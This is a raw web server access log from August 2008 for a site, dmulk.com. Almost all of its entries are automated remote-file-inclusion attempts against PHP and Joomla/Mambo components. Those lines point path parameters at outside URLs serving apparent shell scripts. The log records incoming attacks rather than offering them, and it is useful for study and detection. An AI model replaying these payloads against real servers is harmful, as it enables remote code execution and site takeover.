118.129.166.13 - - [24/Aug/2008:10:13:58 -0700] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:13:59 -0700] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
38.117.65.239 - - [24/Aug/2008:10:14:01 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://125.250.78.194/rgboard/manual/.../sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:14:06 -0700] "GET /logs/access_080718.log/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:14:06 -0700] "GET /plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:14:07 -0700] "GET /logs/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://spiritualcultivation.com/modules/idar.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.16.26.124 - - [24/Aug/2008:10:14:12 -0700] "GET //polls/booth.php?include_path=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.16.26.124 - - [24/Aug/2008:10:14:12 -0700] "GET /logs/access_080312.log//polls/booth.php?include_path=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.16.26.124 - - [24/Aug/2008:10:14:12 -0700] "GET /logs//polls/booth.php?include_path=http://www.sldating.fr/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
218.188.197.136 - - [24/Aug/2008:10:14:20 -0700] "GET /logs/access_080224.log/index.php?p=http://www.topyn.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.96 - - [24/Aug/2008:10:14:20 -0700] "GET /logs/access_080723.log/errors.php?error=http://xwarezx.secretivens.com/a4.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [24/Aug/2008:10:14:21 -0700] "GET /errors.php?error=http://xwarezx.secretivens.com/a4.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.96 - - [24/Aug/2008:10:14:21 -0700] "GET /logs/errors.php?error=http://xwarezx.secretivens.com/a4.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:10:14:28 -0700] "GET /logs/access_080402.log%20//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
212.234.12.71 - - [24/Aug/2008:10:14:29 -0700] "GET /logs/access_080131.log/errors.php?error=http://stiegel.biz//modules//News/admin/language/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.234.12.71 - - [24/Aug/2008:10:14:29 -0700] "GET /errors.php?error=http://stiegel.biz//modules//News/admin/language/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.234.12.71 - - [24/Aug/2008:10:14:30 -0700] "GET /logs/errors.php?error=http://stiegel.biz//modules//News/admin/language/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:14:33 -0700] "GET /logs/access_080522.log/vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.9.3.130 - - [24/Aug/2008:10:14:44 -0700] "GET /logs/access_080517.log/default.php?page=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.9.3.130 - - [24/Aug/2008:10:14:44 -0700] "GET /logs/default.php?page=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.9.3.130 - - [24/Aug/2008:10:14:44 -0700] "GET /default.php?page=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
76.9.3.130 - - [24/Aug/2008:10:14:48 -0700] "GET /logs/access_080401.log/default.php?page=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.111.176.96 - - [24/Aug/2008:10:14:55 -0700] "GET /logs/access_080722.log/errors.php?error=http://xwarezx.secretivens.com/a4.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.234.12.71 - - [24/Aug/2008:10:14:55 -0700] "GET /logs/access_080810.log/errors.php?error=http://stiegel.biz//modules//News/admin/language/if.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.22.204.97 - - [24/Aug/2008:10:14:59 -0700] "GET /logs/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.97 - - [24/Aug/2008:10:14:59 -0700] "GET /administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php?mosConfig_absolute_path=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.6.8.100 - - [24/Aug/2008:10:14:59 -0700] "GET /presto/?N=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:15:14 -0700] "GET /logs/access_080122.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.182 - - [24/Aug/2008:10:15:29 -0700] "GET /blog/wp-content/uploads/dmulk_westoc08_actual.gdb HTTP/1.0" 200 196608 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "dmulk.com"
74.53.240.146 - - [24/Aug/2008:10:16:02 -0700] "GET /logs/access_080619.log/vwar//includes/functions_install.php?vwar_root=http://www.proostjes.be/calendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.97 - - [24/Aug/2008:10:16:23 -0700] "GET /logs/administrator/components/com_webring/admin.webring.docs.php?component_dir=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
203.22.204.97 - - [24/Aug/2008:10:16:23 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://chuckysplace.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.149.232.117 - - [24/Aug/2008:10:16:25 -0700] "GET /logs/myevent.php?myevent_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.149.232.117 - - [24/Aug/2008:10:16:25 -0700] "GET /myevent.php?myevent_path=http://www.clubcello.de/2007/pics/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:10:16:26 -0700] "GET /logs/access_080302.log/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [24/Aug/2008:10:16:26 -0700] "GET /logs/access_080302.log/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:10:16:27 -0700] "GET /?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9915 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:10:16:27 -0700] "GET /logs/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 61999 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [24/Aug/2008:10:16:27 -0700] "GET /?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9915 "-" "libwww-perl/5.805" "www.dmulk.com"
74.55.109.34 - - [24/Aug/2008:10:16:27 -0700] "GET /logs/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 61999 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:10:16:35 -0700] "GET /logs/access_080302.log/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:10:16:36 -0700] "GET /?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9915 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:10:16:37 -0700] "GET /logs/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 61999 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:16:44 -0700] "GET /logs/access_080802.log//common/db.php?commonpath=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.234.12.71 - - [24/Aug/2008:10:16:55 -0700] "GET /logs/access_080723.log/errors.php?error=http://xwarezx.secretivens.com/idwi.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.234.12.71 - - [24/Aug/2008:10:16:55 -0700] "GET /logs/errors.php?error=http://xwarezx.secretivens.com/idwi.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
212.234.12.71 - - [24/Aug/2008:10:16:55 -0700] "GET /errors.php?error=http://xwarezx.secretivens.com/idwi.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
77.222.40.244 - - [24/Aug/2008:10:16:57 -0700] "GET /logs/access_080714.log//includes/db_adodb.php?baseDir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:10:16:57 -0700] "GET /logs/access_080218.log/index.php?id=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:10:16:57 -0700] "GET /logs/index.php?id=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
77.222.40.244 - - [24/Aug/2008:10:16:57 -0700] "GET //includes/db_adodb.php?baseDir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:10:16:58 -0700] "GET /index.php?id=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 200 9885 "-" "libwww-perl/5.813" "www.dmulk.com"
77.222.40.244 - - [24/Aug/2008:10:16:58 -0700] "GET /logs//includes/db_adodb.php?baseDir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:10:16:58 -0700] "GET /logs/access_080714.log//includes/db_adodb.php?baseDir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:10:16:58 -0700] "GET //includes/db_adodb.php?baseDir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.18.29.218 - - [24/Aug/2008:10:16:58 -0700] "GET /logs//includes/db_adodb.php?baseDir=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.234.12.71 - - [24/Aug/2008:10:17:03 -0700] "GET /logs/access_080722.log/errors.php?error=http://xwarezx.secretivens.com/idwi.txt?? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:17:03 -0700] "GET /logs/access_080125.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:17:03 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:17:03 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:10:17:08 -0700] "GET /logs/access_080805.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:10:17:08 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:10:17:09 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:10:17:13 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.9.63.18 - - [24/Aug/2008:10:17:13 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.hladogen.ru/project_files/memei.jpg? HTTP/1.1" 200 9935 "-" "libwww-perl/5.811" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:10:17:14 -0700] "GET /logs/access_080131.log/index.php?pagina=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:10:17:14 -0700] "GET /logs/index.php?pagina=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:10:17:15 -0700] "GET /index.php?pagina=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 200 9889 "-" "libwww-perl/5.813" "www.dmulk.com"
91.121.4.30 - - [24/Aug/2008:10:17:15 -0700] "GET /logs/access_080302.log/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.4.30 - - [24/Aug/2008:10:17:17 -0700] "GET /?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 9915 "-" "libwww-perl/5.805" "www.dmulk.com"
91.121.4.30 - - [24/Aug/2008:10:17:17 -0700] "GET /logs/?option=com_custompages&cpage=http://lnx.padellino.com/forum/modules/inc/prc.gif? HTTP/1.1" 200 61999 "-" "libwww-perl/5.805" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:17:21 -0700] "GET /logs/access_080805.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:17:21 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:17:21 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.97.183.24 - - [24/Aug/2008:10:17:21 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.battle-elite.de/be_inside/images/cicons/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:17:21 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:17:22 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.243.226 - - [24/Aug/2008:10:17:29 -0700] "GET /logs/access_080302.log/index.php?pagina=http://dkp.atrummortis.com/images/glyphs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:17:33 -0700] "GET /logs/access_080801.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:17:39 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:17:39 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:17:39 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:17:44 -0700] "GET /logs/access_080101.log/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://spiritualcultivation.com/modules/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:17:46 -0700] "GET /logs/access_080801.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
118.129.166.13 - - [24/Aug/2008:10:17:50 -0700] "GET /logs/access_080129.log/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://spiritualcultivation.com/modules/idxx.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.85.201.66 - - [24/Aug/2008:10:17:51 -0700] "GET /logs/access_080703.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.battle-elite.de/be_inside/images/cicons/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
81.26.209.159 - - [24/Aug/2008:10:17:52 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.248.62.98 - - [24/Aug/2008:10:17:54 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 200 10036 "-" "libwww-perl/5.65" "www.dmulk.com"
72.52.244.232 - - [24/Aug/2008:10:17:55 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 200 10036 "-" "libwww-perl/5.810" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:17:58 -0700] "GET ///vwar/backup/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
69.94.70.15 - - [24/Aug/2008:10:17:59 -0700] "GET /logs///vwar/backup/errors.php?error=http://sunshineruby.com/han/Favorites/%B9C%C0%B8/Games/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:17:59 -0700] "GET /logs/access_080125.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:17:59 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.212.173.42 - - [24/Aug/2008:10:17:59 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/cid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:18:01 -0700] "GET /logs/access_080114.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:18:01 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.202.49.162 - - [24/Aug/2008:10:18:02 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.gemeinsammehr.de/phpdaten/mcp/data/content/log/evanescence/nid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.52.143.147 - - [24/Aug/2008:10:18:10 -0700] "GET /logs/modules/4nAlbum/public/displayCategory.php?basepath=http://www.hepsiindirimli.com/var/skins_repository/default_green/tumbs.jpg/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:15 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:15 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:15 -0700] "GET /logs/access_080309.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:15 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:16 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:16 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:16 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:16 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.139.184 - - [24/Aug/2008:10:18:16 -0700] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.latinoconvention.com/mambots/system/.sys/.../safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
